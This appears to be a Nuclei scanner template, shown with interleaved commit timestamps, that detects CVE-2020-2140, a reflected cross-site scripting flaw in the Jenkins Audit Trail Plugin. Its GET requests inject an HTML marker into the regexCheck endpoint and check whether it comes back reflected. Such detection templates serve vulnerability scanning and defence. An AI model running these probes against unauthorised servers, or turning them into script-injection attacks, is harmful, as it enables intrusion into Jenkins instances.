2021-01-02 04:56:15 +00:00
id : CVE-2020-2140
2020-08-30 17:42:46 +00:00
info :
author : j3ssie/geraldino2
2021-03-10 11:34:11 +00:00
name : Jenkin Audit Trail Plugin XSS
2020-08-30 17:42:46 +00:00
severity : medium
2020-08-31 07:38:04 +00:00
description : Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.
2021-03-10 11:33:16 +00:00
reference : https://www.jenkins.io/security/advisory/2020-03-09/
2021-02-05 19:44:41 +00:00
tags : cve,cve2020,jenkins,xss
2020-08-31 07:38:04 +00:00
2020-08-30 17:42:46 +00:00
requests :
2020-08-31 07:38:04 +00:00
- method : GET
path :
2020-09-04 05:55:13 +00:00
- "{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"
- "{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"
2020-08-31 07:38:04 +00:00
matchers-condition : and
matchers :
- type : word
2020-08-30 17:42:46 +00:00
words :
- <h1>sample
2020-08-31 07:38:04 +00:00
part : body
2020-12-13 19:24:23 +00:00
- type : word
words :
- "text/html"
part : header
2020-08-31 07:38:04 +00:00
- type : status
status :
- 200
